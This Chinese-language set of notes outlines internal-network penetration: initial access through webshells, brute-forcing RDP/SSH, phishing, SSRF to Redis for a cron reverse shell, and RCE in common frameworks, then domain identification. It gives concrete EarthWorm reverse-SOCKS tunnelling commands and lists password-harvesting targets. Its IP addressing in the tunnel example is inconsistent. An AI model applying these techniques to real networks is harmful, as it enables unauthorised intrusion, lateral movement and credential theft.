一、内网渗透思维建立

一、内网渗透思维建立

前置

什么是内网？

内网一般指局域网，是一种私有网络。内网的计算机与Internet上的其他计算机不一定完全互通。

什么是内网IP？

不太严谨，但是简单的判断方法，适用于大多数情况。
内网IP有三种：
第一种：10.0.0.0 ~ 10.255.255.255
第二种：172.16.0.0 ~ 172.31.255.255
第三种：192.168.0.0 ~ 192.168.255.255

0x01 内网渗透思路脑图

0x02 信息收集，获取权限

webshell

文件上传、命令执行、数据库获取权限&提权等.

弱口令

RDP/SSH弱口令，3389、22端头账号密码爆破猜解等
......

vpn

学校、企业VPN账号密码规则泄露、弱口令猜解
鱼叉
钓鱼邮件

SSRF

利用协议扫6376端口，redis未授权，写计划任务反弹shell

RCE

weblogic、shiro、strtus2、各类cve等

0x03 判断获取到的机器的类型

1. 工作组、域环境概念

工作组：

类比于宿舍环境，所有计算机在同一本地网络中，各计算机平等，每台计算机都各自有各自的用户账户。除拥有其他计算机账户外，无法控制其他计算机。

域环境：

计算机可以在不同的本地网络中，存在域管服务器。在拥有非常多计算机时，可以方便地对所有计算机进行统一管理。域用户每次访问域时必须提供凭证给域管服务器。
域内的机器包含个人机、服务器。
域用户可以登录到域中的所有计算机，但是不一定可以管理这些计算机。

2. 域内各成分对应角色

3. 域机器与工作组机器

ipconfig /all 结果中是否有主DNS后缀

4. 个人机、服务器区分

个人机：win7、win8、win10
服务器：windows server 2003/2008/2012/2016等

5. 内网穿透

端口转发：
cocks代理：
Windows：proxfier
Linux：ProxyChains
（1）正向代理：
（2）反向代理：

1. 当目标网络边界存在公网IP且可任意开监听端口：
./ew_for_Win.exe -s ssocksd -l 8888
上述命令是在该机器（192.168.153.140）开启一个8888的正向连接端口。
然后其它主机可通过设置代理为192.168.153.140:8888添加这个代理，这里使用的是proxychains。
2. 当目标网络边界不存在公网IP，通过反弹方式创建socks代理。
先在一台具有公网 ip 的主机A上运行以下命令：
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
意思是在我们公网VPS上添加一个转接隧道，把1080端口收到的代理请求转交给8888端口。
在目标主机B上启动SOCKS5服务 并反弹到公网主机的8888端口：
ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888
本地主机（192.168.153.129）然后通过添加公网192.168.153.129:1080这个代理,来访问内网机器（192.168.153.129）
当然如果本地主机如果是公网ip，就可以把在公网执行的步骤放在本地执行即可。

6. 取密码

Windows用户密码
浏览器密码
各类连接工具密码
.......

7. 弱口令扫描

数据库、redis（6379）、ssh、web资产等弱口令扫描。

8. 内网web资产扫描

常规外网渗透思路。